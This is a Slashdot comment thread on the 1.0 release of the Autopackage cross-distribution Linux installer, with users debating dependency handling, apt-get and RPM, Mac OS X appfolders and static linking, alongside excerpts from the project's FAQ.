AutoPackaging for Linux

Isak Savo writes "The next generation packaging format for Linux has reached 1.0. With Autopackage officially declared stable, there is now an easy way for developers to create up to date, easy installable packages. There are lots of screenshots available including a flash demo of a package installation."

Oops...

[__aaitqo8496]

Error: 408 Request Time-out

Re:Oops...

Nah, just wait a bit ! They have to unpack all their pages to prove the system's liability.
Or is the server's coffin packaged already ?

Re:Oops...

[scibor]

Posted Zonk and we have "zonk": Parse error: parse error, unexpected '{' in /mnt/usr1/pack/cvs-sync/data/autopackage/index.htm l on line 3 :-( It's a pity, I'm wonder how it looks.

Just a comment...

[pro-mpd]

Aww, already /.'ed... and nyud.net/Coral is saying timeout... :(

They ought to autopackage themselves a mirror

[MsGeek]

Their server is now in smoking ruins.

Re:They ought to autopackage themselves a mirror

should have said:
They autopacked themselves a mirror!

Coralized link

Click here for the coralized mirror.

Aren't there enough

[dg41]

Aren't there enough package/software installation formats for Linux that aren't being used enough as it is?

Re:Aren't there enough

[FooBarWidget]

I knew someone would say that. Read our FAQ. Mike posted a part of it below. Please read our website for the full FAQ once the Slashdotting is over.
And we'll be available at #autopackage at irc.freenode.net if you have questions.

Re:Aren't there enough

[diegocgteleline.es]

yes, but that's not the main problem IMO. Package formats are often tought as the number 1 offender when it comes to inter-distro compatibility, but that's not the main problem. The main problem is that package mainteinance happens at distro-level, instead of developer-level. What we need is to move as much mainteinance work to the developers. It's the number 1 cause of problems: A package in debian may require "libfoo", but in fedora it may depend on "foo" or "foo+randomstring". If all those things would be done at developer level, they'd be more coherent, and inter-distro compatibility would be greater. Package format would be irrelevant.

And this is why autopackage is great. It doesn't tries to replace apt/rpm/gentoo, it just tries to be a good way of distributing software, and encourages developers to create their own "autopackage packages" so they work in every distro

Re:Aren't there enough

You show complete ignorance.

Re:Aren't there enough

[Punto]

Missing from the FAQ: is there a tool that will convert my alredy existing package (in my case a .deb) into this autopackage format? I assume it shouldn't be too complicated since this thing seems to understand most distros..

I alredy have the .deb working, and I don't really feel like making all the work again for every person that comes up with 'OMG TEH ULTIMATE PACKAGINGN SOLUTION LOL!' (no offense ;)

Re:Aren't there enough

If what you say is true, then a lot more people would be using Linux. This current creation is filling a need that exists and can only serve to help the expansion of Linux to the masses. It's about time.

Re:Aren't there enough

[Abcd1234]

If all those things would be done at developer level, they'd be more coherent, and inter-distro compatibility would be greater

Woah woah. Let me just stop and laugh for a moment. You're telling me that random developer X can do a better job of making a package than the people who develop the friggin' distro? Are you kidding?? Seriously, the idea that *more* cooks in the kitchen will somehow result in a "more coherent" set of packages is incredibly laughable...

Re:Aren't there enough

[diegocgteleline.es]

Woah woah. Let me just stop and laugh for a moment. You're telling me that random developer X can do a better job of making a package than the people who develop the friggin' distro? Are you kidding??

They won't do "packaging" better, simply it will be better. The developer of project foo may say: "foo version 2.15-b depends on project bar version 1.1 to run properly", and everyone would follow it. Distros still could package themselves in a different way but that won't bee too common, and at that point people may tell "hey, your fedora package don't works properly in debian". My point is that a common package format

WONT SOLVE ANYTHING. Autopackage doesn't solve anything because it's a better format, but because it has a different philosophy. It doesn't matter how good are deb or rpm - they will NEVER work in another distro just because of their philoshopie

Re:Aren't there enough

[IamTheRealMike]

No it's not possible. Read the packager quickstart, making an autopackage is not a mechanical process and usually involves patching (improving) the software itself.

Re:Aren't there enough

[Peaceful_Patriot]

i downloaded and ran one of the example packages and was pleased with the result. I'm running Deb and it autodetected dependencies and asked permission to get them, The package installation went flawlessly and the program was easy to find and ran smoothly afterward.

I hope this catches on with developers. Ive been using Linux for several years and I still sturggle with installing some packages. A simple, dependable, cross-platform installer will be a real relief for users and remove the last big barrier to widespread adoption of Linux.

Re:Aren't there enough

So how is this different/better then Debian?

Re:Aren't there enough

[Shambhu]

It sounds like you misunderstood. The suggestion is that developers would package their _own_ sofware. The distros wouldn't repackage everybody's software in a way that was unique to that distro, which is what happens now.

Whether or not this would be succesful or not is another question.

Re:Aren't there enough

[Spy+der+Mann]

Woah woah. Let me just stop and laugh for a moment. You're telling me that random developer X can do a better job of making a package than the people who develop the friggin' distro?

Yes, because the people who develop the friggin' distro are uber-geniuses who have gotten accustomed to the command-line way of doing things. They've forgotten what it feels to be a mere mortal (aka Joe User) just trying to install a package in his machine. And linux zealots respect them, not because their expertise in user-friendliness, but because their expertise in hacking-and-slashing the most bits out of their box.

The last thing the Joe user needs is an übergenius (or even worse, a linuxzealot) telling him to RTFM, instead of a user-friendly installation package that makes it UNNECESSARY to RTFM.

Remember this /. article:
Two Years Before the Prompt: A Linux Odyssey. Specially this comment)

Re:Aren't there enough

Package management at the distro-level works far better as long as you don't need any packages that aren't part of the distribution maintained set, and the distro package management system handles dependencies and versions well.

Re:Aren't there enough

[jdh41]

So instead of beign on debian and having libfoo, libfoo-dev and libfoo-doc for everything with version numbers as appropriate I have libsplat, bonglib-development, and apispec-neal? Also distros tend to categorise things in senisble ways as well as maintaing a uniform look and feel of packages, and also maintain sets of packages as "releases" with various suggestoins about their stability or not. Of course we could just rely on everyone making their own RPMs and getting half the dependenices wrong...

Re:Aren't there enough

[diegocgteleline.es]

and the distro package management system handles dependencies and versions well.

Indeed. It does handle it well. If you don't give a fuck if that same package is going to work in other distro

What part of INTER-DISTRO COMPATIBILITY, do you exactly don't understand?

Re:Aren't there enough

[Abcd1234]

Ha ha, you guys kill me...

Yes, because the people who develop the friggin' distro are uber-geniuses who have gotten accustomed to the command-line way of doing things.

And, speaking as a developer myself, I can tell you, developers are, hands down, the *worst* people to put in charge of the user experience. IOW, this is just *another* reason why you really don't want the developers in charge of creating packages, which was my original point to begin with.

The purpose of autopackage

[FooBarWidget]

No doubt lots of people will have all kinds of questions about autopackage, such as:
- "What idiots!! Another packaging format is the last thing we need!"
- "What's wrong with apt-get?"
- "Everybody should use Gentoo!"

Slashdotters are highly encouraged to read the autopackage FAQ! Our project has existed for over 2 years now, and many people have asked us those questions. In short: autopackage is not meant to replace RPM/DEB/apt-get/etc.

If you have more questions, feel free to come over at #autopackage at irc.freenode.net
We'll be glad to answer your questions

Re:The purpose of autopackage

[Dave2+Wickham]

#autopackage probably being the best bet ATM, with sunsite being slashdotted.

Re:The purpose of autopackage

[FooBarWidget]

It seems our servers can't withstand slashdotting. Mike posted the FAQ below. Scroll down to read it.

Re:The purpose of autopackage

[Screaming+Lunatic]

All Your Packages Are Belong To Us [autopackage.org]

All Your Bandwidth Are Belong To Us.

Re:The purpose of autopackage

Dammit! All i get is "emerge: there are no ebuilds to satisfy "autopackage".

Crap! *now* what do I do?!?!?

Re:The purpose of autopackage

[k8to]

Every time autopackage gets mentioned, I look into it, only to come away lost as to what problem the project is trying to solve.

It claims to provide binary packages which will install on any distribution, but I don't see any sort of information about how the project plans to address the fact that binary interfaces on linux systems are moderately unstable. It just seems quixotic.

Re:The purpose of autopackage

[FooBarWidget]

Maybe you didn't take a good look at our website. We have had a solution for binary problems for a long time now, and it's called apbuild. If you have any specific questions, feel free to come over at #autopackage at irc.freenode.net

Re:The purpose of autopackage

[workman161]

In short: autopackage is not meant to replace RPM/DEB/apt-get/etc.

Your signature implies otherwise....

Re:The purpose of autopackage

[rapidweather]

"What's wrong with apt-get?"

Sometimes, it does not work for me. Perhaps it is because I am in a chrooted environment, or something.

I can, however, easily remove packages with apt-get --purge remove thatuslesspackage

I'm looking forward to seeing what autopackage has to offer, and hope that it does make adding new programs to a hard drive installation as easy as Linspire click and run supposedly does it. That is a front end to apt-get, but the packages offered are tested and work with the distro.

Re:The purpose of autopackage

[Tyrdium]

So, it's basically a package format with all dependencies built in, and a nice graphical installer? Sweet! Definitely a good step towards making Linux ready for the average Joe.

(Before I get flamed, note that installing from command line is not a viable option for most people)

Re:The purpose of autopackage

[bosshoff]

Does it integrate with Portage? No. So it really doesn't provide a distro-free solution, in that all it can accomplish at most with a system like Gentoo is allowing you to install something without the system knowing it's there (psst: it isn't that hard to compile source). So ten days (or months) later, you try to install another package, it clobbers this unnsupported software, and you have to go find it again. This = lameness.

Re:The purpose of autopackage

What's wrong with being a man and using slackpacks?

Re:The purpose of autopackage

[Taladar]

(Before I get flamed, note that installing from command line is not a viable option for most people)

Without wanting to flame but I never really understood this. Why is the command line any different than a GUI concerning difficulty? I wouldn't say it is easier but I wouldn't say it is harder than making 3-5 clicks in the GUI to reach the installer file in some file browser and double-click it either. Maybe I am just too much of a geek but is there some fear of the keyboard involved or can anyone enlighten me?

Re:The purpose of autopackage

[Zemran]

I would like to congratulate your team on this. I am happy with .rpm but I know that I am not everyone and I am sure that there are lots of people find rpm too confusing (my mother for one) as well as there are all those that will continue to prefer 'make install'. I think that Linux is about choice, there is a choice for everyone to take up the flavour that they like. There are those that shout about X is best etc. but that is what I mean. They have made their choice and like it. Most of those that shout the loudest are those that have spent time finding what is best for them with little regard to those that do not want to spend that time and just want something that is easy to use. I care about those that want the easy options as well (like my mother :) even though it may not be my choice.

Even though I am happy with .rpm and 'make' I may find that if everything I want starts to arrive in .package format I may become more of a convert because I do not always want to do things the hard way just to prove I can.

Re:The purpose of autopackage

Dammit! All i get is "emerge: there are no ebuilds to satisfy "autopackage".

Crap! *now* what do I do?!?!?

Well duh: autopackage_install autopackage.

Re:The purpose of autopackage

[Tyrdium]

For the average user, clicking "Next" a bunch of times is a lot more intuitive than typing "tar -xzvf foo.tar.gz && cd foo && make && make install" or whatever. Plus, average users tend to be afraid of the command line. Yeah, you're too much of a geek. After all, you're posting on Slashdot. ;-)

Re:The purpose of autopackage

[AKAImBatman]

A few quick comment on your FAQ:

The first reason is the lack of dependency management. Because you are simply moving folders around, there is no logic involved so you cannot check for your apps dependencies.

OS X handles this at runtime. i.e. You can install the software, but the folder contents contain enough information for the OS to give you an error message when you run it. Usually this amounts to nothing more than "OS X 10.3 required!", but it could be more. FWIW, I think the lack of a "standard" set of OS services in Linux complicates this issue. Under OS X (and to a certain degree Windows), developers always know which libraries they can always depend on, and which ones they should bundle.

You'll note that bundled APIs on OS X and Windows tend not to duplicate each other across a given set of installed programs.

One obvious one is that there is no uninstall logic either, so the app never gets a chance to remove any config files it placed on the system.

This would be true on Linux, but it is NOT true on OS X. In OS X, the desktop integrates with the filesytem and learns via events when an application is added or deleted. This means that OS X users see file associations as soon as the program is added to the system, and they also see the deletion of those associations when the program is removed. It's all very seamless and prevents the dangling associations that plague Windows.

The OS X FS takes things one step further by storing file system IDs instead of path names for everything. This means that if I move my program from the Desktop to Applications, the associations will move with it. Similarly, if I have a file open and I move it, my file will save to the new location instead of the old one.

Another is that the app menus are largely determined by filing system structures. This means that it's hard to have separate menus for each user/different desktop environments without huge numbers of (manually maintained) symlinks.

1. An application menu IS just a bunch of glorified symlinks.

2. OS X handles this by having a system wide Applications folder for all users. If users wish to have private programs, they can drag them to their desktop or home folder.

3. The dock is the user's customized menu. The most commonly used apps are usually already there so that users don't have to hunt for them. If a user wants another app on his dock, he can drag it on there to create a shortcut. Shortcuts are deleted by dragging the icon off the dock or into the trash can.

What your FAQ should say is, "Unfortunately, the Linux design philosophy precludes the use of an appfolders system, as the services required to make such a system work are most likely unavailable on most installations."

Now with that cleared up, good job guys. I'm glad to see that someone is finally tackling my number one Linux gripe. (Check my Journal for more info.) :-)

Re:The purpose of autopackage

In short: autopackage is not meant to replace RPM/DEB/apt-get/etc

Your comment "What idiots!! Another packaging format is the last thing we need!" pretty much summed it up.

It would be better if it were meant to replace other installers.

Re:The purpose of autopackage

[Theatetus]

You'll note that bundled APIs on OS X and Windows tend not to duplicate each other across a given set of installed programs.

OK, I don't know much about Mac but I have to call bullshit on Windows there. Windows packages are constantly rolling their own "common" DLLs, with slight differences, overwriting identically-named DLLs from other packages and clobbering that package's symbols. "DLL hell" wasn't just a clever assonance someone came up with.

Re:The purpose of autopackage

[AaronLawrence]

Average users never use the command prompt. So asking them to use a command line to install is like forcing them to learn a whole separate application.
Besides that command lines are typically non-obvious and give you little idea of possible options, until you know the secret incantations (e.g. -?)

Re:The purpose of autopackage

You obviously haven't even tried it, so you shouldn't talk till you have.

And the average user DOES NOT want to compile from source! Understand that oh great Gentoo compiler!

This is a Godsend for software makers and new users to Linux!

Re:The purpose of autopackage

[MadMirko]

"DLL hell" is gone since .NET 1.1: .NET side by side execution

Re:The purpose of autopackage

OS X handles this at runtime. i.e. You can install the software, but the folder contents contain enough information for the OS to give you an error message when you run it.

Linux does that too, obviously (as in 'library xyz not found'), but that is considered unacceptably bad. The whole idea with dependencies is that they can be resolved by the installation program.

Under OS X (and to a certain degree Windows), developers always know which libraries they can always depend on, and which ones they should bundle.

So if a third-party app uses libpng (something not bundled with the system, I'm just making it up here), and two other third-party apps does too you will have THREE installed libpng on your system? And three programs you need to update?

And to top it off, no program for you to keep track of when libpng needs updating. Ouch...

Re:The purpose of autopackage

[TheRaven64]

I like the OS X (and GNUstep) way of handling things, but you are wrong about one thing. Deleting a .app bundle does not delete the configuration files. File associations are stored in a .plist file in each .app bundle, and must be periodically refreshed (fine, the system handles this), but other settings are stored in /Library/ or ~/Library/, and stay around after you have removed the application. This is required due to the way in which applications are upgraded in OS X - delete the old one, drag the new one in - however there is no mechanism provided for removing orphaned config files. Similarly, there is no mechanism provided for uninstalling applications packaged as .pkg bundles (e.g. Apple's X11).

Re:The purpose of autopackage

[FooBarWidget]

Native package manager integration is planned for post-1.0.

Re:The purpose of autopackage

[Bert64]

It would make sense for the installation routine to check for a working libpng on the system, verify that it's compatible, and then use that... Failing that, if theres no libpng installed or a broken one, it could install a copy into it's local app dir..
The idea of a single package management tool managing the whole os is still better tho, unfortunately joe users will want to download $RANDOMAPP and install it in $RANDOMLOCATION regardless of his system package management..
There should be a custom installer tool that integrates with the most common package management tools, so that you can still update things centrally and any missing libs are installed using your existing package management scheme..

Re:The purpose of autopackage

[ajs]

The FAQ demonstrates a profound lack of understanding of existing package managers. For example, many of the features (like location-neutral file dependencies) are standard features of RPM and (I think) DEB.

It strikes me that the only value in this tool is their attempt to produce a cross-platform package manager. Had they done this by auto-generating the deistribution-specific package information (e.g. a .spec file for RPM) based on some meta-information, then I would have said this is a good thing. After all, it would be nice to generate just one installation config file for all platforms and have platform integrators worry about makign that tool work once on system foo, rather than every new project repeating that work.

autopackage does not do this, however. It tries to run its own show, which means that you cannot mix-and-match with existing systems. For example, I might use RPM via APT. I find a new project for the fooerizer, and want to use it. I use autopackage to install it. However, next week my APT repositories pick up fooerizer and, not knowing that I have a more recent version already installed, trash my installation (in potentially incompatible ways).

Re:The purpose of autopackage

[Taladar]

I am aware that compiling from source is not for everyone. However typing "apt-get bla" or "emerge bla" is hardly comparable to your example.

Re:The purpose of autopackage

[torpor]

clicking "[blah]" a bunch of times is a lot more intuitive...

actually, i don't think intuitive is the right word for this. instead, try this:

clicking "[blah]" a bunch of times gives the user the feeling they're doing something on their computer, without actually requiring them to actually understand what it is they're doing at all...

stupid GUI's make users stupid. a good user understands whats going on; that the command line interface is still going strong as a major computer interface paradigm, in light of all the 'GUI' competition, is as sure an indicator that progress isn't in fact being made as anything else may be ..

Re:The purpose of autopackage

[Tyrdium]

Right, but most users have an inherent fear of the command line. They tend to feel they'll screw something up... Which is a bit easier with the command line, especially if you don't really know what you're doing.

Re:The purpose of autopackage

[Tyrdium]

Most users don't really care to understand what's going on; all they want to do is play their newest game (or whatever). For people who want to learn and aren't afraid of a CLI, it's a great experience. Unfortunately, it's not for everyone.

(NB: I've been using Windows for years, and just switched to Gentoo on my laptop. It's quite an experience, but definitely not for the average user. Given past experience with "easy" distros like Fedora Core 3, even they aren't quite ready for the average user yet.)

Re:The purpose of autopackage

[Minna+Kirai]

"DLL hell" is gone since .NET 1.1:

All Windows programs have been rewritten with .NET, and non-dotnet code will no longer run? Good to know!

Re:The purpose of autopackage

[k8to]

apbuild only seems to cover libc issues, not issues with other libraries. Do you plan to cover all library interface changes?

For example, my distribution (debian) contains package names like libpng12, indicating that this particular package has gone through a total of 12 binary-incompatable interfaces changes. libpth is at version 14, and libcrypto++, for example, is apparently binary-incompatable with every release.

Other distributions do not even bother to rename for binary incompatabilities consistently.

How are these issues addressed?

Re:The purpose of autopackage

[FooBarWidget]

It's not possible to cover everything. In case of libpng: we try to work around issues by creating symlinks. But libpng is a pain, it's one of the messiest libraries around (in terms of compatibility). And sometimes packages have to static link small/obscure libraries to work around the dependancy problem. Those solutions are not technically attractive, but at least they work. Long term goal is to educate developers about proper library versioning and the importance of compatibility.

Re:The purpose of autopackage

[k8to]

Okay, that's basically what I thought. There is no good solution to this currently.

This is why I think that autopackage is premature, but that is clearly not the only view. If you can get all the people releasing unix libraries to properly support major minor etc that would be a huge blessing.

However, it seems sometimes it's really a matter of perspective. Sometimes a library is part of a project and has internally used "not published" apis. Then they change or remove these, but a distribution may package the library (which is used by other folks) seperately from the project binaries. So the project sees it as a minor update, but unix versioning rules would require a major number change, if strictly followed.

I guess I think that the work the distribution vendor does to coerce the software into a coherent state with a relative lack of kludging is inherently superior to distributing this work to software authors or distribution-independent packagers. If you can eliminate this disparity as you say by effectively pressing all unix developers into the de-facto unix interfaces policies, as well as other measures, that would be a huge win. And at that time I would think autopackage would be worth using.

apt-get?

[FlashBuster3000]

Nice idea, but where is the difference to apt-get and its various front-ends?
Seems to me like the exact same thing, except that apt-get is proven and widely used..
They don't expect someone to switch to autopackage when so many distros didn't change from rpm to apt, do they?

Re:apt-get?

[Dave2+Wickham]

Autopackage is targetted at end-user installation, not core distro packages; the intention is that the core is still managed with RPM/Deb et al. Read the FAQ posted elsewhere in the topic for more info.

Re:apt-get?

[FooBarWidget]

autopackage is definitely not the same as apt-get. Please read our FAQ. Mike posted it below. You may also want to read the website when it's up.

Kinda sluggish

I'm not going to wait that long to install a simple package.

Re:Kinda sluggish

[Master+of+Transhuman]

Which I guess is why you don't use Windows because just about everything takes that long on Windows - especially when you have to answer license questions AND tell it where to install everything (otherwise it dumps it in your main partition).

The point I'm making is that users who are used to Windows won't find this particularly slow.

Considering the problems it is supposed to solve, it doesn't seem to me to be particularly slow.

Some FAQ entries

[IamTheRealMike]

So much for sunsite having plenty of bandwidth and fast servers! Well, here are some select pieces from the FAQ:

# What is autopackage?

For users: it makes software installation on Linux easier. If a project provides an autopackage, you know it can work on your distribution. You know it'll integrate nicely with your desktop and you know it'll be up to date, because it's provided by the software developers themselves. You don't have to choose which distro you run based on how many packages are available.

For developers: it's software that lets you create binary packages for Linux that will install on any distribution, can automatically resolve dependencies and can be installed using multiple front ends, for instance from the command line or from a graphical interface. It lets you get your software to your users quicker, easier and more reliably. It immediately increases your userbase by allowing people with no native package to run your software within seconds.

# Is autopackage meant to replace RPM?

No. RPM is good at managing the core software of a distro. It's fast, well understood and supports features like prepatching of sources. What RPM is not good at is non-core packages, ie programs available from the net, from commercial vendors, magazine coverdisks and so on. This is the area that autopackage tackles. Although in theory it'd be possible to build a distro based around it, in reality such a solution would be very suboptimal as we sacrifice speed for flexibility and distro neutrality. For instance, it can take several seconds to verify the presence of all required dependencies, something that RPM can do far quicker.

# Why a new format? Why do the RPMs I find on the net today only work on one distro?

There are a number of reasons, some obvious, some not so obvious. Let's take them one at a time:

• Dependency metadata: RPMs can have several types of dependencies, the most common being file deps and package deps. In file deps, the package depends on some other package providing that file. Depending on /bin/bash for a shell script is easy, as that file is in the same location with the same name on all systems. Other dependencies are not so simple, there is no file that reliably expresses the dependency, or the file could be in multiple locations. That means sometimes package dependencies are preferred. Unfortunately, there is no standard for naming packages, and distros give them different names, as well as splitting them into different sized pieces. Because of that, often dependency information has to be expressed in a distro-dependent way.
• RPM features: because RPM is, at the end of the day, a tool to help distro makers, they sometimes add new macros and features to it and then use them in their specfiles. People want proper integration of course, so they use Mandrake specific macros or whatever, and then that RPM won't work properly on other distros.
• Binary portability: This one affects all binary packaging systems. A more detailed explanation of the problems faced can be found in Chapter 7 of the developer guide.
• Bad interactions with source code: because the current versions of RPM don't check the system directly, they only check a database, it makes it hard to install them on distros like Gentoo even when they only use file deps. Similar problems arise if you compile things from source.

There are various reasons why a new format was created rather than changing RPM

Re:Some FAQ entries

[IamTheRealMike]

Why bother?

# What's wrong with centralized repositories, apt style?

The system of attempting to package everything the user of the distro might ever want is not scalable. By not scalable, we mean the way in which packages are created and stored in a central location, usually by separate people to those who made the software in the first place. There are several problems with this approach:

• Centralisation introduces lag between upstream releases and actually being able to install them, sometimes measured in months or years.
• Packaging as separate from development tends to introduce obscure bugs caused by packagers not always fully understanding what it is they're packaging. It makes no more sense than UI design or artwork being done by the distribution.
• Distro developers end up duplicating effort on a massive scale. 20 distros == the same software packaged 20 times == 20 times the chance a user will receive a buggy package. Broken packages are not rare: see Wine, which has a huge number of incorrect packages in circulation, Mono which suffers from undesired distro packaging, etc
• apt et al require extremely well controlled repos, otherwise they can get confused and ask users to provide solutions manually : this requires an understanding of the technology we can't expect users to have.
• Very hard to avoid the "shopping mall" type user interface, at which point choice becomes unmanagably large: see Synaptic for a pathological example of this. Better UIs are possible but you're covering up a programmatic model which doesn't match the user model esp for migrants.
• Pushes the "appliance" line of thinking, where a distro is not a platform on which third parties can build with a strong commitment to stability but merely an appliance: a collection of bits that happen to work together but may not tomorrow: you can use what's on the CDs but extend or modify it and you void the warranty. Appliance distros have their place: live demo CDs, router distros, maybe even server distros, but not desktops. To compete with Windows for mindshare and acceptance we must be a platform.

# What's wrong with NeXT/MacOSX style appfolders?

One of the more memorable features of NeXT based systems like MacOS X or GNUstep is that applications do not have installers, but are contained within a single "appfolder", a special type of directory that contains everything the application needs. To install apps, you just drag them into a special Applications folder. To uninstall, drag them to the trash can. This is a beguilingly easy way of managing software, and it's a common conception that Linux should also adopt this mechanism. I'd like to explain why this isn't the approach that autopackage takes to software management.

The first reason is the lack of dependency management. Because you are simply moving folders around, there is no logic involved so you cannot check for your apps dependencies. Most operating systems are made up of many different components, that work together to make the computer work. Linux is no different, but due to the way in which it was developed, Linux has far more components and is far more "pluggable" than most other platforms. As such, the number of discrete components that must be managed is huge. Linux is different to what came before not only in this respect, but also because virtually all the components are freely available on the internet. Because of this, software often has large numbers of dependencies which must be satisfied for it to work correctly. Even simple programs often make use of many shar

Re:Some FAQ entries

Finally the most straightforward implementation of things like file associations has serious security problems as the broken-by-design DMG exploits on MacOS X have shown. Unfortunately solving these kinds of problems will always be difficult because they run to the core of the systems design.

Thanks you arrogant shitheels, anything can be exploited. A buffer overflow in a PNG or JPEG can take down your system if so designed, saying Disk Images are inherently flawed is a very dumb and arrogant statement.

Re:Some FAQ entries

[jxdxbx]

Hard drive space is cheap. And so is bandwidth. People on 56k connections can install software from CDs. Don't make things broken for everyone to help them.

Do appfolders (bundles), and if you want the functionality of a shared library, include it in the bundle. Unless it's something like 100 megs. Which it won't be.

If dozens of programs each end up including the same shared code in their appfolders, who cares? Again, hard drive space is cheap, and that's the price to pay for easier system management, and knowing that applications won't suddenly stop working when one of their dependencies has been changed.

Bundles are better.

Re:Some FAQ entries

[jxdxbx]

Also, there are no more DMG exploits. There is nothing wrong with having a few XML files around that belong to an application you no longer have, if it it really irks you, or if programs leave behind large caches, there are plenty of pieces of software that will delete preferences and caches that belong to software you no longer have.

Most applications shouldn't need to modify the OS to run, and for that minority that do, OS X still does have packages. This is how haxies and so forth work.

The only valid objection I've seen to bundles is the one about how a user shouldn't be able to install random software from the internet. This is a pretty good point, but I fail to see how that, even in a system that uses an apt repository, you would be able to prevent a user from downloading and installing some random RPM from a website. You would have to have a severely crippled OS.

Re:Some FAQ entries

[Dave2+Wickham]

Bundles are bad. What happens when a major vulnerability is found in a library which is used by a bunch of apps? With shared deps, you just update that and it's fixed. With bundles you have to update every single app.

Re:Some FAQ entries

If it's so widely used it should become a framework.

Re:Some FAQ entries

Hard drive space is cheap. And so is bandwidth. People on 56k connections can install software from CDs. Don't make things broken for everyone to help them.

Memory is not cheap. And nor is mailing CDs to the third world. Linux is international. Don't screw things up for the rest of the world just to get your American ass a little more convenience.

If dozens of programs each end up including the same shared code in their appfolders, who cares?

Anyone with limited memory. Which is most people.

Bundles are better.

If you're rich and American. Newsflash - most of the world's population doesn't fall into either category.

Re:Some FAQ entries

[IamTheRealMike]

Read the section on static linking - hard disk space may be cheap but memory is at a premium in most systems.

Re:Some FAQ entries

[mattkinabrewmindspri]

Conversely, if a major vulnerability is found in a library that is only being used by one application, only that application is vulnerable.

Re:Some FAQ entries

[IamTheRealMike]

Are you sure about that? How do you know there are no more exploits? Do you have some power of clairvoyence nobody else does?

The thing that concerns me about the DMG exploits, is that they were caused by the fundamental design of the system not simple typos/poor coding practice. Having appfolders integrate with the system by registering file associations/URL handlers silently through the shell seems like the obvious way to handle this stuff in an "install free" environment, though really it's just doing the install at a later time. But it had unintended side effects which were devastating for security.

The problem is, to solve this you either have to go back to some explicit action integrating software with the system, or pile on more hacks to try and solve the security exploits. Apple chose both - Tiger boasts an improved installer, iTunes comes inside a package etc. But the approach they took with Safari reminds me of Internet Explorer: cover up a flawed technology like ActiveX with more and more hacks and security restrictions that somehow always managed to leak.

You are right that most applications should not need to modify the "system" to run. This is the principle behind authentication-less installation, which we only approximate on Linux with the install to $HOME feature in autopackage. Figuring out the exact set of permissions that are safe for installers to have and then enforcing them is somewhat tricky: both Windows and MacOS X are riddled with programs that demand the administrator password which implies that so far, nobody quite identified the sweet spot.

Re:Some FAQ entries

[jd142]

Don't screw things up for the rest of the world just to get your American ass a little more convenience.

But I thought that was our national policy. Certainly seems that way historically. ;)

Re:Some FAQ entries

Disk space may be cheap, but memory pressure is still a significant bottleneck on most desktop systems.

Although the poster fails to mention this, someone should point out that yes, some people do use laptops, and on laptops disk space pressure is _much_ more severe (memory pressure is worse too due to factors such as the greater use of shared-memory video, but that's another issue). Generally you cannot just add another disk to a laptop -- they only have one hard drive bay. You can connect a USB/Firewire drive, but that adversely affects the portability of your data. Furthermore, laptop drives are more expensive than desktop drives, and the drive which comes with a laptop is usually smaller than what you'd get with a desktop (30-40 Gig laptop drives are still common).

Re:Some FAQ entries

Beep beep! Apple fanboy alert!

Re:Some FAQ entries

[N3wsByt3]

"What RPM is not good at is non-core packages, ie programs available from the net, from commercial vendors, magazine coverdisks and so on. "

You can say that again. In fact, this has exactly been my gripe with linux, including the so-called user-freindly distro's.

Apt-get, rpm, whatever - but if you are just browsing the Net and want to install something it's a real PITA, with Linux. There is no equivalent of an .exe, so you either have to be lucky that they not only have a linux version, but the right rpm for your specific distro, or you can get messy with hopefully clearly mentionned commands on the commandline - which defeats the purpose of having a GUI somewhat.

I have recently have another try at linux, but I just had to give up: while the installation of the OS itself went very well (impressive, even), the real problem was getting applications installed and working. when apt-get or urpmi or whatever doesn't have what you want, or fail for some reason, you just can't do shit, as a joe doe newbie.

Linuw really isn't ready for prime-time on the desktop, that's my honest opinion. But, maybe through projects like these, which *really* try to give the same klick-and-install ease of use, it might finally get there.

Re:Some FAQ entries

[Hynee]

Do appfolders (bundles), and if you want the functionality of a shared library, include it in the bundle. Unless it's something like 100 megs. Which it won't be.
If dozens of programs each end up including the same shared code in their appfolders, who cares?

*sigh*

From the FAQ, which has been mirrored just above,

Disk space may be cheap, but memory pressure is still a significant bottleneck on most desktop systems. Static linking prevents page-level sharing which is easily the biggest win in terms of memory usage. Without extensive use of dynamic linking, desktop Linux would slow to a crawl.

Did you seriously just read half a sentence in the FAQ and then reply? FFS. Read up on the paging file article that was posted here ~2 days ago.

Re:Some FAQ entries

[Nailer]

"I fail to see how that, even in a system that uses an apt repository, you would be able to prevent a user from downloading and installing some random RPM from a website. You would have to have a severely crippled OS."

It's pretty simple: if the package isn't signed by someone you trust, refuse to install it. This has the been the behaviour in up2date since it was created, and yum does the same thing. I'd be very surprised if apt/get (at least on systems where package signing is expected) didn't do the same.

RPM itself, when used directly, currently throws up a warning if a package isn't signed by someone trusted, but (uunlike up2date / yum / etc) still installs it. This behavior may change in future tho.

Re:Some FAQ entries

[Taladar]

And you can do what exactly if the Windows Installer for something you downloaded fails (which appears to happen quite regularly to me, especially with older software designed for pre-xp windows versions)?

Re:Some FAQ entries

[lcracker]

Uh, this "dmg exploit" was fixed a long time ago, well before Tiger, soon after the exploit made the rounds. All they had to do was add a notification that you are opening a document or URL with an application that you have never explicitly run before. A relatively small change to LaunchServices.

Relatively few programs for Mac OS X demand an administrator password.

iTunes has always been shipped in a pkg.

I'm guessing your Mac OS X experience consists entirely of what you read in slashdot comments?

Re:Some FAQ entries

[dcstimm]

static linking does not use any more memory "not harddrive space" than dynamicly linking them, hell have you ever used macosx?

Re:Some FAQ entries

Exactly! Then you don't want to reinstall the whole app, just the library.

Re:Some FAQ entries

[IamTheRealMike]

I have, and you apparently aren't using the same definition of static linking as used on Linux. I do not mean including a framework inside another framework that is then automagically shared (except when it's not, for various inscrutable reasons). I'm talking about toolchain/compile level static linking. You can "statically link" shared libraries using rpath tricks and such on Linux too, however this technique isn't always useful.

Re:Some FAQ entries

[IamTheRealMike]

No, I've used it a fair bit. Why don't you stop making assumptions about what I have or have not done?

By the way I don't consider putting up warnings to be a "fix". After all, that worked wonders for ActiveX didn't it?

Re:Some FAQ entries

[silicon+not+in+the+v]

Apt-get, rpm, whatever - but if you are just browsing the Net and want to install something it's a real PITA, with Linux. There is no equivalent of an .exe, so you either have to be lucky that they not only have a linux version, but the right rpm for your specific distro, or you can get messy with hopefully clearly mentionned commands on the commandline - which defeats the purpose of having a GUI somewhat.

I have recently have another try at linux, but I just had to give up: while the installation of the OS itself went very well (impressive, even), the real problem was getting applications installed and working. when apt-get or urpmi or whatever doesn't have what you want, or fail for some reason, you just can't do shit, as a joe doe newbie.

